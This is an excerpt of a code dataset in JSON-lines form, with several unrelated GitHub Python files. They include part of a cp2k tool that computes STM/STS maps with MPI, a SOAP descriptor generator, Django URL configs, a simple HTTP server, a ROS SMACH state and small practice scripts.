self.local_cell = self.local_cell_n*self.dv\n\n for ispin in range(self.nspin):\n\n orbitals_per_rank = np.array([len(gme) for gme in self.global_morb_energies_by_rank[ispin]])\n total_orb = sum(orbitals_per_rank)\n\n for rank in range(self.mpi_size):\n\n # which indexes to send?\n ix_start, ix_end = self.x_ind_per_rank(rank)\n \n if self.mpi_rank == rank:\n recvbuf = np.empty(sum(orbitals_per_rank)*num_spatial_points, dtype=self.cgo.dtype)\n #print(\"R%d expecting counts: \" % (self.mpi_rank) + str(orbitals_per_rank*num_spatial_points))\n #sys.stdout.flush()\n else:\n recvbuf = None\n\n sendbuf = self.cgo.morb_grids[ispin][:, ix_start:ix_end, :, :].ravel()\n #print(\"R%d -> %d sending %d\" %(self.mpi_rank, rank, len(sendbuf)))\n #sys.stdout.flush()\n\n # Send the orbitals\n self.mpi_comm.Gatherv(sendbuf=sendbuf,\n recvbuf=[recvbuf, orbitals_per_rank*num_spatial_points], root=rank)\n\n if self.mpi_rank == rank:\n self.local_orbitals.append(recvbuf.reshape(total_orb, self.local_cell_n[0], self.local_cell_n[1], self.local_cell_n[2]))\n \n if self.ptip_enabled:\n ### Calculate and divide also the p-tip contribution,\n ### as derivatives are hard to account for after dividing the orbitals in space\n p_tip_contrib = (np.gradient(self.cgo.morb_grids[ispin], axis=1)/self.dv[0])**2\n p_tip_contrib += (np.gradient(self.cgo.morb_grids[ispin], axis=2)/self.dv[1])**2\n\n for rank in range(self.mpi_size):\n ix_start, ix_end = self.x_ind_per_rank(rank)\n if self.mpi_rank == rank:\n recvbuf = np.empty(sum(orbitals_per_rank)*num_spatial_points, dtype=self.cgo.dtype)\n else:\n recvbuf = None\n sendbuf = p_tip_contrib[:, ix_start:ix_end, :, :].ravel()\n self.mpi_comm.Gatherv(sendbuf=sendbuf,\n recvbuf=[recvbuf, orbitals_per_rank*num_spatial_points], root=rank)\n if self.mpi_rank == rank:\n self.local_orbital_ptip.append(recvbuf.reshape(total_orb, self.local_cell_n[0], self.local_cell_n[1], self.local_cell_n[2]))\n\n\n def gather_global_energies(self):\n self.global_morb_energies_by_rank = []\n self.global_morb_energies = []\n for ispin in range(self.nspin):\n morb_en_gather = self.mpi_comm.allgather(self.cgo.morb_energies[ispin])\n self.global_morb_energies_by_rank.append(morb_en_gather)\n self.global_morb_energies.append(np.hstack(morb_en_gather))\n\n def gather_orbitals_from_mpi(self, to_rank, from_rank):\n self.current_orbitals = []\n for ispin in range(self.nspin):\n\n if self.mpi_rank == from_rank:\n self.mpi_comm.Send(self.cgo.morb_grids[ispin].ravel(), to_rank)\n if self.mpi_rank == to_rank:\n num_rcv_orb = len(self.global_morb_energies[ispin][from_rank])\n cell_n = self.cgo.eval_cell_n\n rcv_buf = np.empty(num_rcv_orb*cell_n[0]*cell_n[1]*cell_n[2], dtype=self.cgo.dtype)\n self.mpi_comm.Recv(rcv_buf, from_rank)\n self.current_orbitals.append(rcv_buf.reshape(num_rcv_orb, cell_n[0], cell_n[1], cell_n[2]))\n\n ### -----------------------------------------\n ### Making data series\n ### -----------------------------------------\n\n def _get_isosurf_indexes(self, data, value, interp=True):\n rev_data = data[:, :, ::-1]\n \n # Add a zero-layer at start to make sure we surpass it\n zero_layer = np.zeros((data.shape[0], data.shape[1], 1))\n rev_data = np.concatenate((zero_layer, rev_data), axis=2)\n \n nz = rev_data.shape[2]\n\n # Find first index that surpasses the isovalue\n indexes = np.argmax(rev_data > value, axis=2)\n # If an index is 0, no values in array are bigger than the specified\n num_surpasses = (indexes == 0).sum()\n if num_surpasses != 0:\n print(\"Warning: The isovalue %.3e was not reached for %d pixels\" % (value, num_surpasses))\n # Set surpasses as the bottom surface\n indexes[indexes == 0] = nz - 1\n \n if interp:\n indexes_float = indexes.astype(float)\n for ix in range(np.shape(rev_data)[0]):\n for iy in range(np.shape(rev_data)[1]):\n ind = indexes[ix, iy]\n if ind == nz - 1:\n continue\n val_g = rev_data[ix, iy, ind]\n val_s = rev_data[ix, iy, ind - 1]\n indexes_float[ix, iy] = ind - (val_g-value)/(val_g-val_s)\n return nz - indexes_float - 1\n return nz - indexes.astype(float) - 1\n\n def _index_with_interpolation(self, index_arr, array):\n i = index_arr.astype(int)\n remain = index_arr-i\n iplus = np.clip(i+1, a_min=None, a_max=len(array)-1)\n return array[iplus]*remain +(1-remain)*array[i]\n\n def _take_2d_from_3d(self, val_arr,z_indices):\n # Get number of columns and rows in values array\n nx, ny, nz = val_arr.shape\n # Get linear indices \n idx = z_indices + nz*np.arange(ny) + nz*ny*np.arange(nx)[:,None]\n return val_arr.flatten()[idx]\n\n def _index_with_interpolation_3d(self, index_arr, array_3d):\n i = index_arr.astype(int)\n remain = index_arr-i\n iplus = np.clip(i+1, a_min=None, a_max=array_3d.shape[2]-1)\n return self._take_2d_from_3d(array_3d, iplus)*remain +(1-remain)*self._take_2d_from_3d(array_3d, i)\n\n def gaussian(self, x, fwhm):\n sigma = fwhm/2.3548\n return np.exp(-x**2/(2*sigma**2))/(sigma*np.sqrt(2*np.pi))\n\n def gaussian_area(self, a, b, x0, fwhm):\n sigma = fwhm/2.3548\n integral = 0.5*(scipy.special.erf((b-x0)/(np.sqrt(2)*sigma)) - scipy.special.erf((a-x0)/(np.sqrt(2)*sigma)))\n return np.abs(integral)\n\n def local_data_plane_above_atoms(self, local_data, height):\n \"\"\"\n Returns the 2d plane above topmost atom in z direction\n height in [angstrom]\n \"\"\"\n topmost_atom_z = np.max(self.cgo.ase_atoms.positions[:, 2]) # Angstrom\n plane_z = (height + topmost_atom_z) * ang_2_bohr\n plane_z_wrt_orig = plane_z - self.local_origin[2]\n\n plane_index = int(np.round(plane_z_wrt_orig/self.local_cell[2]*self.local_cell_n[2]))\n return local_data[:, :, plane_index]\n\n def s_p_type_signal(self, i_spin, i_mo, p_tip_ratio):\n if p_tip_ratio == 0.0:\n return self.local_orbitals[i_spin][i_mo]**2\n else:\n return (1.0 - p_tip_ratio) * self.local_orbitals[i_spin][i_mo]**2 + p_tip_ratio * self.local_orbital_ptip[i_spin][i_mo]\n\n def build_stm_series(self, e_arr, fwhms, heights, isovalues, p_tip_ratio=0.0):\n\n #print(\"Create series: \" + str(e_arr))\n\n rev_output = False\n if np.abs(e_arr[-1]) < np.abs(e_arr[0]):\n e_arr = e_arr[::-1]\n rev_output = True\n\n cc_ldos = np.zeros((len(fwhms), len(isovalues), self.local_cell_n[0], self.local_cell_n[1], len(e_arr)), dtype=self.cgo.dtype)\n cc_map = np.zeros((len(fwhms), len(isovalues), self.local_cell_n[0], self.local_cell_n[1], len(e_arr)), dtype=self.cgo.dtype)\n ch_ldos = np.zeros((len(fwhms), len(heights), self.local_cell_n[0], self.local_cell_n[1], len(e_arr)), dtype=self.cgo.dtype)\n ch_map = np.zeros((len(fwhms), len(heights), self.local_cell_n[0], self.local_cell_n[1], len(e_arr)), dtype=self.cgo.dtype)\n\n def index_energy(inp):\n if not inp.any():\n return None\n return np.argmax(inp)\n\n for i_fwhm, fwhm in enumerate(fwhms):\n \n cur_charge_dens = np.zeros(self.local_cell_n)\n\n last_e = 0.0\n\n for i_e, e in enumerate(e_arr):\n # ---------------------\n # Contributing orbitals in the energy range since last energy value\n close_indexes = []\n for ispin in range(self.nspin):\n e1 = np.min([last_e, e])\n e2 = np.max([last_e, e])\n close_i1 = index_energy(self.global_morb_energies[ispin] > e1 - 2.0*fwhm)\n close_i2 = index_energy(self.global_morb_energies[ispin] > e2 + 2.0*fwhm)\n if close_i1 is None:\n close_i1 = 0\n if close_i2 is None:\n close_i2 = len(self.global_morb_energies[ispin])\n close_indexes.append(np.arange(close_i1, close_i2))\n\n # ---------------------\n # Update charge density\n for ispin in range(self.nspin):\n for i_mo in close_indexes[ispin]:\n morb_en = self.global_morb_energies[ispin][i_mo]\n broad_factor = self.gaussian_area(last_e, e, morb_en, fwhm)\n cur_charge_dens += broad_factor*self.s_p_type_signal(ispin, i_mo, p_tip_ratio)\n\n # ---------------------\n # find surfaces corresponding to isovalues\n for i_iso, isoval in enumerate(isovalues):\n \n i_isosurf = self._get_isosurf_indexes(cur_charge_dens, isoval, True)\n cc_map[i_fwhm, i_iso, :, :, i_e] = self._index_with_interpolation(i_isosurf, self.z_arr)\n \n for ispin in range(self.nspin):\n for i_mo in close_indexes[ispin]:\n morb_en = self.global_morb_energies[ispin][i_mo]\n morb_on_surf = self._index_with_interpolation_3d(\n i_isosurf,\n self.s_p_type_signal(ispin, i_mo, p_tip_ratio)\n )\n cc_ldos[i_fwhm, i_iso, :, :, i_e] += self.gaussian(e - morb_en, fwhm) * morb_on_surf\n \n # ---------------------\n # find constant height images\n for i_h, height in enumerate(heights):\n \n ch_map[i_fwhm, i_h, :, :, i_e] = self.local_data_plane_above_atoms(cur_charge_dens, height)\n\n for ispin in range(self.nspin):\n for i_mo in close_indexes[ispin]:\n morb_en = self.global_morb_energies[ispin][i_mo]\n morb_on_plane = self.local_data_plane_above_atoms(\n self.s_p_type_signal(ispin, i_mo, p_tip_ratio),\n height\n )\n ch_ldos[i_fwhm, i_h, :, :, i_e] += self.gaussian(e - morb_en, fwhm) * morb_on_plane\n last_e = e\n\n if rev_output:\n return cc_ldos[:, :, :, :, ::-1], cc_map[:, :, :, :, ::-1], ch_ldos[:, :, :, :, ::-1], ch_map[:, :, :, :, ::-1]\n else:\n return cc_ldos, cc_map, ch_ldos, ch_map\n\n \n def calculate_stm_maps(self, fwhms, isovalues, heights, energies, series_name='stm', i_series_offset=0):\n \"\"\"\n STM maps for specified energies, isovalues, heights, fwhms.\n \"\"\"\n\n e_arr = np.sort(energies)\n emin = e_arr[0]\n emax = e_arr[-1]\n\n if series_name not in self.series_output:\n number_of_series = (len(heights) + len(isovalues)) * len(fwhms) * 2 * len(self.p_tip_ratios)\n self.series_output[series_name] = {\n 'general_info': {'energies': e_arr},\n 'series_info': [],\n 'series_data': np.zeros((number_of_series, len(e_arr), self.local_cell_n[0], self.local_cell_n[1]), dtype=self.cgo.dtype)\n }\n \n i_series_counter = i_series_offset\n\n for p_tip_ratio in self.p_tip_ratios:\n\n if emin * emax >= 0.0:\n cc_sts, cc_stm, ch_sts, ch_stm = self.build_stm_series(e_arr, fwhms, heights, isovalues, p_tip_ratio)\n else:\n e_arr_neg = e_arr[e_arr <= 0.0]\n e_arr_pos = e_arr[e_arr > 0.0]\n\n cc_sts_n, cc_stm_n, ch_sts_n, ch_stm_n = self.build_stm_series(e_arr_neg, fwhms, heights, isovalues, p_tip_ratio)\n cc_sts_p, cc_stm_p, ch_sts_p, ch_stm_p = self.build_stm_series(e_arr_pos, fwhms, heights, isovalues, p_tip_ratio)\n\n cc_sts = np.concatenate((cc_sts_n, cc_sts_p), axis=4)\n cc_stm = np.concatenate((cc_stm_n, cc_stm_p), axis=4)\n ch_sts = np.concatenate((ch_sts_n, ch_sts_p), axis=4)\n ch_stm = np.concatenate((ch_stm_n, ch_stm_p), axis=4)\n\n # Move energy axis to position 2 (Other axes remain in their original order)\n cc_sts = np.moveaxis(cc_sts, 4, 2)\n cc_stm = np.moveaxis(cc_stm, 4, 2)\n ch_sts = np.moveaxis(ch_sts, 4, 2)\n ch_stm = np.moveaxis(ch_stm, 4, 2)\n\n ### ------------------------------------\n ### Save the data to self.series_output\n\n\n for i_fwhm, fwhm in enumerate(fwhms):\n\n for i_h, h in enumerate(heights):\n self.series_output[series_name]['series_info'].append({\n 'type': 'const-height sts',\n 'height': h,\n 'fwhm': fwhm,\n 'p_tip_ratio': p_tip_ratio,\n })\n self.series_output[series_name]['series_data'][i_series_counter, :, :, :] = ch_sts[i_fwhm, i_h, :, :, :]\n i_series_counter += 1\n\n for i_isov, isov in enumerate(isovalues):\n self.series_output[series_name]['series_info'].append({\n 'type': 'const-isovalue sts',\n 'isovalue': isov,\n 'fwhm': fwhm,\n 'p_tip_ratio': p_tip_ratio,\n })\n self.series_output[series_name]['series_data'][i_series_counter, :, :, :] = cc_sts[i_fwhm, i_isov, :, :, :]\n i_series_counter += 1\n\n for i_h, h in enumerate(heights):\n self.series_output[series_name]['series_info'].append({\n 'type': 'const-height stm',\n 'height': h,\n 'fwhm': fwhm,\n 'p_tip_ratio': p_tip_ratio,\n })\n self.series_output[series_name]['series_data'][i_series_counter, :, :, :] = ch_stm[i_fwhm, i_h, :, :, :]\n i_series_counter += 1\n\n for i_isov, isov in enumerate(isovalues):\n self.series_output[series_name]['series_info'].append({\n 'type': 'const-isovalue stm',\n 'isovalue': isov,\n 'fwhm': fwhm,\n 'p_tip_ratio': p_tip_ratio,\n })\n self.series_output[series_name]['series_data'][i_series_counter, :, :, :] = cc_stm[i_fwhm, i_isov, :, :, :]\n i_series_counter += 1\n \n\n def collect_local_grid(self, local_arr, global_shape, to_rank = 0):\n \"\"\"\n local_arr needs to have x as first axis\n \"\"\"\n\n size_except_x = np.prod(global_shape[1:])\n\n nx_per_rank = np.array([ self.x_ind_per_rank(r)[1] - self.x_ind_per_rank(r)[0] for r in range(self.mpi_size) ])\n\n if self.mpi_rank == to_rank:\n recvbuf = np.empty(sum(nx_per_rank)*size_except_x, dtype=self.cgo.dtype)\n #print(\"R%d expecting counts: \" % (self.mpi_rank) + str(nx_per_rank*size_except_x))\n else:\n recvbuf = None\n \n sendbuf = local_arr.ravel()\n\n self.mpi_comm.Gatherv(sendbuf=sendbuf, recvbuf=[recvbuf, nx_per_rank*size_except_x], root=to_rank)\n if self.mpi_rank == to_rank:\n recvbuf = recvbuf.reshape(global_shape)\n return recvbuf\n\n def collect_series_maps(self):\n\n nx = self.cell_n[0]\n ny = self.cell_n[1]\n\n for label, ser in self.series_output.items():\n\n ne = len(ser['general_info']['energies'])\n n_ser = len(ser['series_info'])\n\n ser['series_data'] = self.collect_local_grid(ser['series_data'].swapaxes(0, 2), np.array([nx, ne, n_ser, ny]))\n\n if self.mpi_rank == 0:\n ser['series_data'] = ser['series_data'].swapaxes(2, 0)\n\n def apply_zero_threshold(self, data_array, zero_thresh):\n # apply it to every energy slice independently\n for i_series in range(data_array.shape[0]):\n for i_e in range(data_array.shape[1]):\n sli = data_array[i_series, i_e, :, :]\n slice_absmax = np.max(np.abs(sli))\n sli[np.abs(sli) < slice_absmax*zero_thresh] = 0.0\n\n def collect_and_save_stm_maps(self, path = \"./stm.npz\"):\n\n self.collect_series_maps()\n \n if self.mpi_rank == 0:\n\n save_data = {\n 'stm_general_info': self.series_output['stm']['general_info'],\n 'stm_series_info': self.series_output['stm']['series_info'],\n 'stm_series_data': self.series_output['stm']['series_data'].astype(np.float32),\n }\n\n ### ----------------\n ### Reduce filesize further by zero threshold\n zero_thresh = 1e-3\n self.apply_zero_threshold(save_data['stm_series_data'], zero_thresh)\n ### ----------------\n\n # additionally add info\n save_data['stm_general_info']['x_arr'] = np.arange(0.0, self.cell_n[0]*self.dv[0] + self.dv[0]/2, self.dv[0]) + self.origin[0]\n save_data['stm_general_info']['y_arr'] = np.arange(0.0, self.cell_n[1]*self.dv[1] + self.dv[1]/2, self.dv[1]) + self.origin[1]\n np.savez_compressed(path, **save_data)\n\n # Reset, otherwise can cause problems (more versatile to NOT reset, though)\n self.series_output = {}\n\n ### -----------------------------------------\n ### Orbital analysis and export\n ### -----------------------------------------\n\n def create_orb_series(self, orb_indexes, height_list=[], isoval_list=[], fwhm_list=[]):\n \"\"\"\n orb_indexes - orbital indexes w.r.t. to \"ref_index_glob\" for both spin channels\n \"\"\"\n orb_indexes_wrt_data_start = []\n n_orb = len(orb_indexes)\n\n ens_list = []\n\n # Setup the series' dictionaries\n for i_spin in range(self.nspin):\n label = 's%d_orb' % i_spin\n self.series_output[label] = {}\n\n orb_indexes_wrt_data_start.append(list(np.array(orb_indexes) + self.cgo.cwf.ref_index_glob))\n\n # Orbital / energy info\n for i_spin in range(self.nspin):\n label = 's%d_orb' % i_spin\n\n ens_list.append(self.global_morb_energies[i_spin][orb_indexes_wrt_data_start[i_spin]])\n physical_index_list = self.cgo.cwf.global_morb_indexes[i_spin][orb_indexes_wrt_data_start[i_spin]]\n\n self.series_output[label]['general_info'] = {\n 'energies': ens_list[-1],\n 'orb_indexes': physical_index_list,\n 'homo': physical_index_list[self.cgo.i_homo_glob[i_spin]],\n 'spin': i_spin,\n }\n self.series_output[label]['series_info'] = []\n \n number_of_series = (\n len(height_list) # just s-type WFN LDOS\n + len(height_list) * len(self.p_tip_ratios) # p-type WFN ch-signals\n + len(isoval_list) * len(self.p_tip_ratios) # p-type WFN cc-signals\n + len(height_list) * 2*len(fwhm_list) * len(self.p_tip_ratios) # p-type ch sts & stm signals\n + len(isoval_list) * 2*len(fwhm_list) * len(self.p_tip_ratios) # p-type cc sts & stm signals\n )\n\n # Orbital series\n for i_spin in range(self.nspin):\n label = 's%d_orb' % i_spin\n\n self.series_output[label]['series_data'] = np.zeros(\n (number_of_series, n_orb, self.local_cell_n[0], self.local_cell_n[1]),\n dtype=self.cgo.dtype)\n\n i_series_counter = 0\n\n ### constant-height orbital series\n\n for i_h, h in enumerate(height_list):\n\n ## orbital wavefunction\n\n # series info\n self.series_output[label]['series_info'].append({\n 'type': 'const-height orbital',\n 'height': h,\n })\n\n # series data\n i_orb_count = 0\n for i_mo in orb_indexes_wrt_data_start[i_spin]:\n self.series_output[label]['series_data'][i_series_counter, i_orb_count, :, :] = (\n self.local_data_plane_above_atoms(self.local_orbitals[i_spin][i_mo], h)\n )\n i_orb_count += 1\n i_series_counter += 1\n\n ## orbital ch-signal with the different tips\n for i_p, p_tip_ratio in enumerate(self.p_tip_ratios):\n\n # series info\n self.series_output[label]['series_info'].append({\n 'type': 'const-height orbital sts',\n 'height': h,\n 'p_tip_ratio': p_tip_ratio,\n })\n\n # series data\n i_orb_count = 0\n for i_mo in orb_indexes_wrt_data_start[i_spin]:\n s_p_data = self.s_p_type_signal(i_spin, i_mo, p_tip_ratio)\n self.series_output[label]['series_data'][i_series_counter, i_orb_count, :, :] = (\n self.local_data_plane_above_atoms(s_p_data, h)\n )\n i_orb_count += 1\n i_series_counter += 1\n\n ### constant-isovalue orbital series\n\n for i_isov, isov in enumerate(isoval_list):\n for i_p, p_tip_ratio in enumerate(self.p_tip_ratios):\n\n # series info\n self.series_output[label]['series_info'].append({\n 'type': 'const-isovalue orbital sts',\n 'isovalue': isov,\n 'p_tip_ratio': p_tip_ratio,\n })\n\n # series data\n i_orb_count = 0\n for i_mo in orb_indexes_wrt_data_start[i_spin]:\n i_isosurf = self._get_isosurf_indexes(\n self.s_p_type_signal(i_spin, i_mo, p_tip_ratio),\n isov, True\n )\n self.series_output[label]['series_data'][i_series_counter, i_orb_count, :, :] = (\n self._index_with_interpolation(i_isosurf, self.z_arr)\n )\n i_orb_count += 1\n i_series_counter += 1\n\n self.calculate_stm_maps(\n fwhm_list, isoval_list, height_list, ens_list[i_spin], series_name='s%d_orb'%i_spin, i_series_offset=i_series_counter\n )\n\n\n def collect_and_save_orb_maps(self, path = \"./orb.npz\"):\n\n self.collect_series_maps()\n \n if self.mpi_rank == 0:\n\n save_data = {\n 's0_orb_general_info': self.series_output['s0_orb']['general_info'],\n 's0_orb_series_info': self.series_output['s0_orb']['series_info'],\n 's0_orb_series_data': self.series_output['s0_orb']['series_data'].astype(np.float32),\n }\n\n ### ----------------\n ### Reduce filesize further by zero threshold\n zero_thresh = 1e-3\n self.apply_zero_threshold(save_data['s0_orb_series_data'], zero_thresh)\n ### ----------------\n\n # additionally add info\n save_data['s0_orb_general_info']['x_arr'] = np.arange(0.0, self.cell_n[0]*self.dv[0] + self.dv[0]/2, self.dv[0]) + self.origin[0]\n save_data['s0_orb_general_info']['y_arr'] = np.arange(0.0, self.cell_n[1]*self.dv[1] + self.dv[1]/2, self.dv[1]) + self.origin[1]\n\n if \"s1_orb\" in self.series_output:\n save_data['s1_orb_general_info'] = self.series_output['s1_orb']['general_info']\n save_data['s1_orb_series_info'] = self.series_output['s1_orb']['series_info']\n save_data['s1_orb_series_data'] = self.series_output['s1_orb']['series_data'].astype(np.float32)\n\n self.apply_zero_threshold(save_data['s1_orb_series_data'], zero_thresh)\n save_data['s1_orb_general_info']['x_arr'] = np.arange(0.0, self.cell_n[0]*self.dv[0] + self.dv[0]/2, self.dv[0]) + self.origin[0]\n save_data['s1_orb_general_info']['y_arr'] = np.arange(0.0, self.cell_n[1]*self.dv[1] + self.dv[1]/2, self.dv[1]) + self.origin[1]\n\n np.savez_compressed(path, **save_data)\n\n # Reset, otherwise can cause problems (more versatile to NOT reset, though)\n self.series_output = {}\n","repo_name":"nanotech-empa/cp2k-spm-tools","sub_path":"cp2k_spm_tools/cp2k_stm_sts.py","file_name":"cp2k_stm_sts.py","file_ext":"py","file_size_in_byte":29065,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"35489663800","text":"#!/home/projects/ku_00039/people/zelili/programs/miniconda2/envs/phyluce-1.7.1/bin/python\nimport os\nimport sys\nimport csv\nimport numpy as np\nimport pandas as pd\n\nfolderpath = r\"/home/projects/ku_10024/people/zelili/berter/data/vecs\"\nfilepaths = [os.path.join(folderpath, name) for name in os.listdir(folderpath)]\n\ni = 0\nfor path in filepaths:\n if(len(path)>len('/home/projects/ku_10024/people/zelili/berter/data/vecs/abstracts_aa.vecs')):\n if(i%10==0 or i == 159):\n if(i != 0):\n print('save abstracts_'+str(i)+'.vecs')\n tmpdf.to_csv('/home/projects/ku_10024/people/zelili/berter/data/abstracts_'+str(i)+'.vecs', sep=\"\\t\")\n print('create new df from', i)\n tmpdf = pd.DataFrame(columns=['pmid', 'fasttext', 'biowordvec', 'bert', 'biobert'])\n vecs = pd.read_csv(path, index_col=0, sep='\\t')\n tmpdf = pd.concat([tmpdf, vecs])\n i = i + 1\n\n","repo_name":"lzlniu/abstracts_vecs","sub_path":"data/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40057114322","text":"from dscribe.descriptors import SOAP\nfrom ase.io import read\nimport numpy as np\nfrom sparse import save_npz\nimport os\n\n# Settings\nbasepath = os.getcwd() # base path where avg SOAP matrices will be stored\nsoap_params = {'rcut': 4.0, 'sigma': 0.1, 'nmax': 9, 'lmax': 9,\n\t\t\t 'rbf': 'gto', 'average': 'off', 'crossover': True}\nxyz_path = os.path.join('..','qmof-geometries.xyz') # appended XYZ of structures (length N)\nrefcodes_path = os.path.join('..','qmof-refcodes.csv') # refcode for each structure (length N)\n\n#---------------------------------------\n# Make folder if not present\nif not os.path.exists(os.path.join(basepath, 'soap_matrices')):\n\tos.mkdir(os.path.join(basepath, 'soap_matrices'))\n\n# Read in structures\nstructures = read(xyz_path, index=':')\n\n# Read in refcodes\nrefcodes = np.genfromtxt(refcodes_path, delimiter=',', dtype=str).tolist()\nif len(refcodes) != len(structures):\n\traise ValueError('Mismatch in refcodes and num. structures')\n\n# Get unique species\nspecies = []\nfor structure in structures:\n\tsyms = np.unique(structure.get_chemical_symbols())\n\tspecies.extend([sym for sym in syms if sym not in species])\nspecies.sort()\n\n# Initialize SOAP\nsoap = SOAP(\n\tspecies=species,\n\tperiodic=True,\n\tsigma=soap_params['sigma'],\n\trcut=soap_params['rcut'],\n\tnmax=soap_params['nmax'],\n\tlmax=soap_params['lmax'],\n\trbf=soap_params['rbf'],\n\taverage=soap_params['average'],\n\tcrossover=soap_params['crossover'],\n\tsparse=True\n)\n\n# Make SOAP fingerprints\nfor i, structure in enumerate(structures):\n\trefcode = refcodes[i]\n\tsoap_filename = os.path.join(\n\t\tbasepath, 'soap_matrices', 'soap_'+refcode+'.npz')\n\tif os.path.exists(soap_filename):\n\t\tcontinue\n\tsoap_matrix = soap.create(structure)\n\tsave_npz(soap_filename, soap_matrix)\n","repo_name":"arosen93/QMOF","sub_path":"machine_learning/soap_kernel/soap_matrix_generator.py","file_name":"soap_matrix_generator.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"61"} +{"seq_id":"38328568743","text":"from django.conf.urls import include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^', include('metroapp.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^i18n/', include('django.conf.urls.i18n')),\n]\n","repo_name":"tristanguigue/metro","sub_path":"conf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1283556614","text":"import http.server\nimport socketserver\n\nPORT = 8080\n\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(b\"Title goes here.\")\n self.wfile.write(b\"

Hello World!

\")\ntry:\n server = http.server.HTTPServer(('', PORT), MyHandler)\n print('Started http server')\n server.serve_forever()\nexcept KeyboardInterrupt:\n print('^C received, shutting down server')\n server.socket.close()","repo_name":"m-adams/hellopython","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4856309638","text":"from geometry_msgs.msg import Twist\nfrom smach import State\n\n\ndef check_if_twist_msg_is_zero(twist_msg, linear_threshold, angular_threshold):\n assert isinstance(twist_msg, Twist)\n if abs(twist_msg.linear.x) > linear_threshold:\n return False\n elif abs(twist_msg.linear.y) > linear_threshold:\n return False\n elif abs(twist_msg.linear.z) > linear_threshold:\n return False\n elif abs(twist_msg.angular.x) > angular_threshold:\n return False\n elif abs(twist_msg.angular.y) > angular_threshold:\n return False\n elif abs(twist_msg.angular.z) > angular_threshold:\n return False\n else:\n return True\n\n\nclass CheckIfTwistMsgIsZero(State):\n def __init__(self, lin_threshold, ang_threshold):\n \"\"\"SMACH State\n :type lin_threshold: float\n :param lin_threshold: Minimum absolute value for twist.linear.(x,y,z) value to be considered non-zero\n\n :type ang_threshold: float\n :param ang_threshold: Minimum absolute value for twist.angular.(x,y,z) value to be considered non-zero\n \"\"\"\n State.__init__(self, outcomes=['true', 'false'], input_keys=['twist_msg'])\n\n self.lin_threshold = lin_threshold\n self.ang_threshold = ang_threshold\n\n self.active = False\n\n def enter(self, ud):\n self.active = True\n\n def execute(self, ud):\n self.enter(ud)\n\n twist_msg = ud.twist_msg\n if check_if_twist_msg_is_zero(twist_msg, self.lin_threshold, self.ang_threshold):\n return self.exit(ud, 'true')\n else:\n return self.exit(ud, 'false')\n\n def exit(self, ud, outcome):\n self.active = False\n return outcome\n","repo_name":"metamorph-inc/hebi_hexapod","sub_path":"hebihexapod_description/src/common_states/check_if_twist_msg_is_zero.py","file_name":"check_if_twist_msg_is_zero.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9996555381","text":"import IndhuGpay\r\n\r\nIndhu=IndhuGpay.GooglePay(\"Indhumathi22068@gmail.com.com\",\"6382656210\",\"Indhumathi\")\r\nIndhu.open_gpay()\r\nIndhu.mobile_verification()\r\nIndhu.emailid_verification()\r\nIndhu.name_verification()\r\nIndhu.otp_verification(15698,15698)\r\nIndhu.Bank_verification()\r\nIndhu.set_Pin(\"9876\")\r\nIndhu.Enter_your_Pin(3465,3465)\r\n\r\nclass Phone_pe(IndhuGpay.GooglePay): \r\n def __init__(slef,Email_ID,Phone_number,name):\r\n super().__init__(Email_ID,Phone_number,name)\r\n\r\n def open_phonepe(self):\r\n print(\"Phone pe\")\r\n \r\nThakur=Phone_pe(\"indhu@gmail.com\",\"9274683744\",\"Mathi\")\r\nThakur.open_phonepe()\r\nThakur.mobile_verification()\r\nThakur.name_verification()\r\nThakur.otp_verification(780965,780965)\r\nThakur.Bank_verification()\r\nThakur.set_Pin(\"653908\")\r\nThakur.Enter_your_Pin(3564,3564)\r\n\r\na={}\r\ncondition=[]\r\n \r\ngpay=[{\"name\":\"anu\",\"GpayNumber\":8738451827,\"Type\":\"personal\",\"Transaction Details\":\"Regular\"}, \r\n {\"name\":\"akalya\",\"GpayNumber\":7305341565,\"Type\":\"personal\",\"Transaction Details\":\"Regular\"},\r\n {\"name\":\"Zumana\",\"GpayNumber\":9812875432,\"Type\":\"personal\",\"Transaction Details\":\"Regular\"},\r\n {\"name\":\"Zahwah\",\"GpayNumber\":9791277389,\"Type\":\"personal\",\"Transaction Details\":\"Regular\"},]\r\ngpay.append(condition)\r\n\r\nprint(gpay)\r\n \r\n\r\n","repo_name":"disys-indhu/gpay","sub_path":"Gpay2.py","file_name":"Gpay2.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12880402163","text":"\"\"\"docstring\"\"\"\nfrom django.urls import path\nfrom . import views\n\napp_name = 'vnm'\nurlpatterns = [\n path('', views.index, name='index'),\n path('likes//', views.likes, name='likes'),\n path('article/create/', views.ArticleCreateView.as_view(), name=\"article_create\"),\n path('watchlist/register', views.WatchListRegister.as_view(), name=\"watchlist_register\")\n]\n","repo_name":"tdev1999/Portfolio","sub_path":"mysite/vietnam_research/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11883033487","text":"c = \"catsandog\"\n\n\nk = [\"cats\",\"dog\",\"sand\",\"and\",\"cat\"]\n\nf = None\nfor i in range(len(k)):\n # print(\"\".join(c.split(k[i]).pop()))\n f = \"\".join(c.split(k[i]).pop())\n print(f)\n\n# Check if of the elements in k is reused multiple 